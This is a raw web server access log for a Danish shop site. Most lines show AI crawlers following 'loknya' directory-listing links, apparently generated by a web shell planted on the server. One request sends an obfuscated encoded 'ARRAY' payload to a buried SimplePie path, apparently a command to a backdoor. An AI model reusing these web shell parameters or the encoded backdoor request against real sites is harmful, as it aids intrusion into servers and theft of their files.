74.7.227.174 - - [29/Jul/2026:08:38:40 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././././.wp-cli/cache/plugin HTTP/2" 200 1824 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././././.wp-cli/cache" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:38:39 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/8/0 HTTP/2" 200 2038 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:40 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F2%2F9%2Fa HTTP/2" 200 1995 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:40 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F9%2F2%2Fa HTTP/2" 200 2054 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:40 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fd%2F3%2F4 HTTP/2" 200 2037 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.21.40.28 - - [29/Jul/2026:08:36:40 +0200] "GET /wp-includes/SimplePie/library/SimplePie/Net/Net/index.php?ARRAY=7o2230223n313738353331303630302p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353330373030302q3065393363663536663831303265666366376461396337363362363430613430222p2232223n223035353065336239323162373134656535373262646164306539663230643661222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34382q35392q36342q37342q38362q3131227q HTTP/1.1" 500 567 "-" "-"
216.73.216.125 - - [29/Jul/2026:08:38:40 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fb%2F2%2Fc HTTP/2" 200 2004 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:41 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/c/0/d/c0ddc0aefba7c7e7&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/0/d HTTP/2" 200 1850 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/0/d" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:38:41 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/6/4 HTTP/2" 200 1990 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:41 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F2%2Fb%2Fc HTTP/2" 200 2049 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:41 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2F. HTTP/2" 200 1759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
